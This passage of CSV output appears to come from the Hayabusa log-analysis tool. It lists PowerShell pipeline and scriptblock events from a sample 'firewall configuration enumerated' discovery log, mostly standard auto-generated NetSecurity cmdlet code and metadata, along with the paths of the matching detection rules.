$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetFirewallSecurityFilter</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""Authentication""> <Type PSType=""NetSecurity.Authentication""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Encryption""> <Type PSType=""NetSecurity.Encryption""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""OverrideBlockRules""> <Type PSType=""boolean""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""LocalUsers""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""LocalUser"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""RemoteUsers""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""RemoteUser"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""RemoteMachines""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""RemoteMachine"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetFirewallRuleFilterBySecurity"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallRule"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallRule""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""Authentication""> <Type PSType=""NetSecurity.Authentication""/> <CmdletParameterMetadata PSName=""Authentication""/> </Parameter> <Parameter ParameterName=""Encryption""> <Type PSType=""NetSecurity.Encryption""/> <CmdletParameterMetadata PSName=""Encryption""/> </Parameter> <Parameter ParameterName=""OverrideBlockRules""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""OverrideBlockRules""/> </Parameter> <Parameter ParameterName=""LocalUsers""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""LocalUser""/> </Parameter> <Parameter ParameterName=""RemoteUsers""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""RemoteUser""/> </Parameter> <Parameter ParameterName=""RemoteMachines""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""RemoteMachine""/> </Parameter> </Parameters> </Method> <GetCmdletParameters> <QueryOptions> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> </Cmdlet> </InstanceCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.Authentication"" UnderlyingType=""uint16""> <Value Name=""NotRequired"" Value=""0""/> <Value Name=""Required"" Value=""1""/> <Value Name=""NoEncap"" Value=""2""/> </Enum> <Enum EnumName=""NetSecurity.Encryption"" UnderlyingType=""uint16""> <Value Name=""NotRequired"" Value=""0""/> <Value Name=""Required"" Value=""1""/> <Value Name=""Dynamic"" Value=""2""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.879 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 